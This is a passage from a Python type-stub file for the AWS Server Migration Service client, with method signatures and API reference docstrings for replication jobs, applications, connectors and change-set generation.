:param tags:
List of tags to be associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:rtype: dict
:returns:
"""
pass
def create_replication_job(self, serverId: str, seedReplicationTime: datetime, frequency: int = None, runOnce: bool = None, licenseType: str = None, roleName: str = None, description: str = None, numberOfRecentAmisToKeep: int = None, encrypted: bool = None, kmsKeyId: str = None) -> Dict:
"""
Creates a replication job. The replication job schedules periodic replication runs to replicate your server to AWS. Each replication run creates an Amazon Machine Image (AMI).
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/CreateReplicationJob>`_
**Request Syntax**
::
response = client.create_replication_job(
serverId='string',
seedReplicationTime=datetime(2015, 1, 1),
frequency=123,
runOnce=True|False,
licenseType='AWS'|'BYOL',
roleName='string',
description='string',
numberOfRecentAmisToKeep=123,
encrypted=True|False,
kmsKeyId='string'
)
**Response Syntax**
::
{
'replicationJobId': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJobId** *(string) --*
The unique identifier of the replication job.
:type serverId: string
:param serverId: **[REQUIRED]**
The identifier of the server.
:type seedReplicationTime: datetime
:param seedReplicationTime: **[REQUIRED]**
The seed replication time.
:type frequency: integer
:param frequency:
The time between consecutive replication runs, in hours.
:type runOnce: boolean
:param runOnce:
:type licenseType: string
:param licenseType:
The license type to be used for the AMI created by a successful replication run.
:type roleName: string
:param roleName:
The name of the IAM role to be used by the AWS SMS.
:type description: string
:param description:
The description of the replication job.
:type numberOfRecentAmisToKeep: integer
:param numberOfRecentAmisToKeep:
The maximum number of SMS-created AMIs to retain. The oldest will be deleted once the maximum number is reached and a new AMI is created.
:type encrypted: boolean
:param encrypted:
When *true* , the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
:type kmsKeyId: string
:param kmsKeyId:
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
"""
pass
def delete_app(self, appId: str = None, forceStopAppReplication: bool = None, forceTerminateApp: bool = None) -> Dict:
"""
Deletes an existing application. Optionally deletes the launched stack associated with the application and all AWS SMS replication jobs for servers in the application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteApp>`_
**Request Syntax**
::
response = client.delete_app(
appId='string',
forceStopAppReplication=True|False,
forceTerminateApp=True|False
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to delete.
:type forceStopAppReplication: boolean
:param forceStopAppReplication:
While deleting the application, stop all replication jobs corresponding to the servers in the application.
:type forceTerminateApp: boolean
:param forceTerminateApp:
While deleting the application, terminate the stack corresponding to the application.
:rtype: dict
:returns:
"""
pass
def delete_app_launch_configuration(self, appId: str = None) -> Dict:
"""
Deletes existing launch configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.delete_app_launch_configuration(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the launch configuration.
:rtype: dict
:returns:
"""
pass
def delete_app_replication_configuration(self, appId: str = None) -> Dict:
"""
Deletes existing replication configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.delete_app_replication_configuration(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the replication configuration.
:rtype: dict
:returns:
"""
pass
def delete_replication_job(self, replicationJobId: str) -> Dict:
"""
Deletes the specified replication job.
After you delete a replication job, there are no further replication runs. AWS deletes the contents of the Amazon S3 bucket used to store AWS SMS artifacts. The AMIs created by the replication runs are not deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteReplicationJob>`_
**Request Syntax**
::
response = client.delete_replication_job(
replicationJobId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:rtype: dict
:returns:
"""
pass
def delete_server_catalog(self) -> Dict:
"""
Deletes all servers from your server catalog.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteServerCatalog>`_
**Request Syntax**
::
response = client.delete_server_catalog()
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:rtype: dict
:returns:
"""
pass
def disassociate_connector(self, connectorId: str) -> Dict:
"""
Disassociates the specified connector from AWS SMS.
After you disassociate a connector, it is no longer available to support replication jobs.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DisassociateConnector>`_
**Request Syntax**
::
response = client.disassociate_connector(
connectorId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type connectorId: string
:param connectorId: **[REQUIRED]**
The identifier of the connector.
:rtype: dict
:returns:
"""
pass
def generate_change_set(self, appId: str = None, changesetFormat: str = None) -> Dict:
"""
Generates a target change set for a currently launched stack and writes it to an Amazon S3 object in the customer’s Amazon S3 bucket.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GenerateChangeSet>`_
**Request Syntax**
::
response = client.generate_change_set(
appId='string',
changesetFormat='JSON'|'YAML'
)
**Response Syntax**
::
{
's3Location': {
'bucket': 'string',
'key': 'string'
}
}
**Response Structure**
- *(dict) --*
- **s3Location** *(dict) --*
Location of the Amazon S3 object.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
:type appId: string
:param appId:
ID of the application associated with the change set.
:type changesetFormat: string
:param changesetFormat:
Format for the change set.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def generate_template(self, appId: str = None, templateFormat: str = None) -> Dict:
"""
Generates an Amazon CloudFormation template based on the current launch configuration and writes it to an Amazon S3 object in the customer’s Amazon S3 bucket.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GenerateTemplate>`_
**Request Syntax**
::
response = client.generate_template(
appId='string',
templateFormat='JSON'|'YAML'
)
**Response Syntax**
::
{
's3Location': {
'bucket': 'string',
'key': 'string'
}
}
**Response Structure**
- *(dict) --*
- **s3Location** *(dict) --*
Location of the Amazon S3 object.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
:type appId: string
:param appId:
ID of the application associated with the Amazon CloudFormation template.
:type templateFormat: string
:param templateFormat:
Format for generating the Amazon CloudFormation template.
:rtype: dict
:returns:
"""
pass
def get_app(self, appId: str = None) -> Dict:
"""
Retrieve information about an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetApp>`_
**Request Syntax**
::
response = client.get_app(
appId='string'
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Information about the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's creation.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of server groups belonging to the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of tags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type appId: string
:param appId:
ID of the application whose information is being retrieved.
:rtype: dict
:returns:
"""
pass
def get_app_launch_configuration(self, appId: str = None) -> Dict:
"""
Retrieves the application launch configuration associated with an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.get_app_launch_configuration(
appId='string'
)
**Response Syntax**
::
{
'appId': 'string',
'roleName': 'string',
'serverGroupLaunchConfigurations': [
{
'serverGroupId': 'string',
'launchOrder': 123,
'serverLaunchConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'logicalId': 'string',
'vpc': 'string',
'subnet': 'string',
'securityGroup': 'string',
'ec2KeyName': 'string',
'userData': {
's3Location': {
'bucket': 'string',
'key': 'string'
}
},
'instanceType': 'string',
'associatePublicIpAddress': True|False
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **appId** *(string) --*
ID of the application associated with the launch configuration.
- **roleName** *(string) --*
Name of the service role in the customer's account that Amazon CloudFormation uses to launch the application.
- **serverGroupLaunchConfigurations** *(list) --*
List of launch configurations for server groups in this application.
- *(dict) --*
Launch configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group the launch configuration is associated with.
- **launchOrder** *(integer) --*
Launch order of servers in the server group.
- **serverLaunchConfigurations** *(list) --*
Launch configuration for servers in the server group.
- *(dict) --*
Launch configuration for a server.
- **server** *(dict) --*
Identifier of the server the launch configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **logicalId** *(string) --*
Logical ID of the server in the Amazon CloudFormation template.
- **vpc** *(string) --*
Identifier of the VPC the server should be launched into.
- **subnet** *(string) --*
Identifier of the subnet the server should be launched into.
- **securityGroup** *(string) --*
Identifier of the security group that applies to the launched server.
- **ec2KeyName** *(string) --*
Name of the EC2 SSH Key to be used for connecting to the launched server.
- **userData** *(dict) --*
Location of the user-data script to be executed when launching the server.
- **s3Location** *(dict) --*
Amazon S3 location of the user-data script.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
- **instanceType** *(string) --*
Instance type to be used for launching the server.
- **associatePublicIpAddress** *(boolean) --*
If true, a publicly accessible IP address is created when launching the server.
:type appId: string
:param appId:
ID of the application launch configuration.
:rtype: dict
:returns:
"""
pass
def get_app_replication_configuration(self, appId: str = None) -> Dict:
"""
Retrieves an application replication configuration associatd with an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.get_app_replication_configuration(
appId='string'
)
**Response Syntax**
::
{
'serverGroupReplicationConfigurations': [
{
'serverGroupId': 'string',
'serverReplicationConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'serverReplicationParameters': {
'seedTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'licenseType': 'AWS'|'BYOL',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string'
}
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **serverGroupReplicationConfigurations** *(list) --*
Replication configurations associated with server groups in this application.
- *(dict) --*
Replication configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group this replication configuration is associated with.
- **serverReplicationConfigurations** *(list) --*
Replication configuration for servers in the server group.
- *(dict) --*
Replication configuration of a server.
- **server** *(dict) --*
Identifier of the server this replication configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **serverReplicationParameters** *(dict) --*
Parameters for replicating the server.
- **seedTime** *(datetime) --*
Seed time for creating a replication job for the server.
- **frequency** *(integer) --*
Frequency of creating replication jobs for the server.
- **runOnce** *(boolean) --*
- **licenseType** *(string) --*
License type for creating a replication job for the server.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep when creating a replication job for this server.
- **encrypted** *(boolean) --*
When true, the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
:type appId: string
:param appId:
ID of the application associated with the replication configuration.
:rtype: dict
:returns:
"""
pass
def get_connectors(self, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the connectors registered with the AWS SMS.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetConnectors>`_
**Request Syntax**
::
response = client.get_connectors(
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'connectorList': [
{
'connectorId': 'string',
'version': 'string',
'status': 'HEALTHY'|'UNHEALTHY',
'capabilityList': [
'VSPHERE'|'SCVMM'|'HYPERV-MANAGER'|'SNAPSHOT_BATCHING',
],
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmManagerId': 'string',
'ipAddress': 'string',
'macAddress': 'string',
'associatedOn': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **connectorList** *(list) --*
Information about the registered connectors.
- *(dict) --*
Represents a connector.
- **connectorId** *(string) --*
The identifier of the connector.
- **version** *(string) --*
The connector version.
- **status** *(string) --*
The status of the connector.
- **capabilityList** *(list) --*
The capabilities of the connector.
- *(string) --*
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The VM management product.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **ipAddress** *(string) --*
The IP address of the connector.
- **macAddress** *(string) --*
The MAC address of the connector.
- **associatedOn** *(datetime) --*
The time the connector was associated.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_replication_jobs(self, replicationJobId: str = None, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the specified replication job or all of your replication jobs.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetReplicationJobs>`_
**Request Syntax**
::
response = client.get_replication_jobs(
replicationJobId='string',
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'replicationJobList': [
{
'replicationJobId': 'string',
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'seedReplicationTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'nextReplicationRunStartTime': datetime(2015, 1, 1),
'licenseType': 'AWS'|'BYOL',
'roleName': 'string',
'latestAmiId': 'string',
'state': 'PENDING'|'ACTIVE'|'FAILED'|'DELETING'|'DELETED'|'COMPLETED'|'PAUSED_ON_FAILURE'|'FAILING',
'statusMessage': 'string',
'description': 'string',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string',
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
]
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJobList** *(list) --*
Information about the replication jobs.
- *(dict) --*
Represents a replication job.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **seedReplicationTime** *(datetime) --*
The seed replication time.
- **frequency** *(integer) --*
The time between consecutive replication runs, in hours.
- **runOnce** *(boolean) --*
- **nextReplicationRunStartTime** *(datetime) --*
The start time of the next replication run.
- **licenseType** *(string) --*
The license type to be used for the AMI created by a successful replication run.
- **roleName** *(string) --*
The name of the IAM role to be used by the Server Migration Service.
- **latestAmiId** *(string) --*
The ID of the latest Amazon Machine Image (AMI).
- **state** *(string) --*
The state of the replication job.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **description** *(string) --*
The description of the replication job.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep in the customer's account for a replication job. By default the value is set to zero, meaning that all AMIs are kept.
- **encrypted** *(boolean) --*
Whether the replication job should produce encrypted AMIs or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMI or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type replicationJobId: string
:param replicationJobId:
The identifier of the replication job.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
"""
pass
def get_replication_runs(self, replicationJobId: str, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the replication runs for the specified replication job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetReplicationRuns>`_
**Request Syntax**
::
response = client.get_replication_runs(
replicationJobId='string',
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'replicationJob': {
'replicationJobId': 'string',
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'seedReplicationTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'nextReplicationRunStartTime': datetime(2015, 1, 1),
'licenseType': 'AWS'|'BYOL',
'roleName': 'string',
'latestAmiId': 'string',
'state': 'PENDING'|'ACTIVE'|'FAILED'|'DELETING'|'DELETED'|'COMPLETED'|'PAUSED_ON_FAILURE'|'FAILING',
'statusMessage': 'string',
'description': 'string',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string',
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
]
},
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJob** *(dict) --*
Information about the replication job.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **seedReplicationTime** *(datetime) --*
The seed replication time.
- **frequency** *(integer) --*
The time between consecutive replication runs, in hours.
- **runOnce** *(boolean) --*
- **nextReplicationRunStartTime** *(datetime) --*
The start time of the next replication run.
- **licenseType** *(string) --*
The license type to be used for the AMI created by a successful replication run.
- **roleName** *(string) --*
The name of the IAM role to be used by the Server Migration Service.
- **latestAmiId** *(string) --*
The ID of the latest Amazon Machine Image (AMI).
- **state** *(string) --*
The state of the replication job.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **description** *(string) --*
The description of the replication job.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep in the customer's account for a replication job. By default the value is set to zero, meaning that all AMIs are kept.
- **encrypted** *(boolean) --*
Whether the replication job should produce encrypted AMIs or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
